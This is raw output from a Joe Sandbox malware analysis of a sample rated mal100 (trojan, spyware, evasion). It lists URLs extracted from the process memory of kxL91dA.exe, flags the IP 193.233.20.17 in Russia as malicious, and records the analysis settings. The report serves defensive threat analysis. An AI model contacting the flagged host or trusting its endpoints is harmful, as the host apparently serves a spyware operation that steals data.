                              http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPkxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabkxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id12ResponsekxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id2ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id21ResponsekxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id9kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id8kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Entity/Id5kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id7kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Entity/Id6kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id19ResponsekxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Entity/Id22Response0kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencekxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id15ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id6ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.ip.sb/ipsMt14vz.exe, 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe.2.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/sckxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id9ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id20kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id21kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id22kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id1ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedkxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegokxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingkxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trustkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id11kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id12kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id16ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id13kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id14kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id15kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id16kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/NoncekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id17kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id18kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id5ResponsekxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id19kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnskxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id10ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RenewkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id8ResponsekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id4(kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentitykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://search.yahoo.com?fr=crmas_sfpfkxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeykxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingexkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoorkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncekxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsekxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewkxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          193.233.20.17
                                                                                                                                                          unknownRussian Federation
                                                                                                                                                          8749REDCOM-ASRedcomKhabarovskRussiaRUtrue
                                                                                                                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                          Analysis ID:811560
                                                                                                                                                          Start date and time:2023-02-19 02:31:04 +01:00
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 8m 30s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Number of analysed new started processes analysed:20
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample file name:21fvBVFMsn.exe
                                                                                                                                                          Original Sample Name:478e1c903cfcda85acdb9759ae80e155.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@12/8@0/1
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 80%
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                                                          • Quality average: 85.2%
                                                                                                                                                          • Quality standard deviation: 22.7%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 191
                                                                                                                                                          • Number of non-executed functions: 96
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 8.238.88.254, 8.248.133.254, 67.26.139.254, 8.248.149.254, 8.250.153.254, 209.197.3.8
                                                                                                                                                          • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
                                                                                                                                                          • Execution Graph export aborted for target kxL91dA.exe, PID 3228 because it is empty
